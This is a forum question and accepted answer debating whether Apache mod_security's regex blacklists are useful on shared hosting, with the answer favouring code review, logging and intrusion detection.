I've recently been frequented by erroneous error messages from mod_security. Its filter sets cover outdated PHP exploits, and I have to rewrite my stuff because WordPress&Co had bugs years ago.
Does this happen to anyone else?
Apache mod_security blocks possibly
dangerous HTTP requests before they
reach applications (PHP specifically).
It uses various filter sets, mostly
regex based.
So I have a nice shared hosting provider, technically apt and stuff. But this bugged me:
Just last week I had to change a parameter name &src= in one of my apps because mod_security blocks ANY requests with that. I didn't look up its details, but this filter rule was preventing the exploitability of another app which I don't use and probably never had heard about. Still I had to rewrite my code (renaming parameter often suffices to trick mod_security) which had nothing to do or in common with that!
And today, a silly regex blocks form submissions, because I wanted to submit php sample code. Given, this is the simple stuff that mod_security is there to protect against. But I don't believe mod_security can detect seriously obfuscated code, and just goes off at obvious (and in this case totally trivial) php snippets.
Basically I'm getting penalized by mod_security because other people released bug-prone apps. (Not saying my apps are ultra secure – I'm pretty security wary, but make no hyperbolic claims.)
I've already asked my provider to disable it anyway, the benefits are too minuscle IMO and for my apps.
What do you think? Does mod_security make much sense outside of WP hosting? Or is it really just a bunch of blacklists of long passed security bugs? Which of its rules are actually helpful? Is there an application level equivalent?
Best Answer
I personally see mod_security as a patch. I use it on some of our servers where we can't control the code that's uploaded (shared hosting servers, for example), but it's never really felt like a good solution to me. Based on it's wide and very general blacklist approach, it's more of a patch to cover up security holes than a good security policy.
It can also provide a false sense of security. mod_security can reveal some common attacks but can by no means prevent any attack. Again, it's a blacklist of common known attacks. If you simply install mod_security and think that you're magically secure, you're horribly mistaken.
I have found a much better policy to me managed servers where my team reviews all code that is placed on them, combined with lots of logs, logfile analysis, reporting systems, and intrusion detection/intrusion prevention systems (IPS). Everytime third-party or open-source software is installed (I'm looking at you, WordPress!) we keep a log of where it was installed, and when new versions are released we update every copy that was installed.
Again, you're more likely to find mod_security on a shared hosting server, as you're experiencing now. As you grow you can move to a VPS or clod based hosting provider where you get your own managed environment and can more tightly control the available software.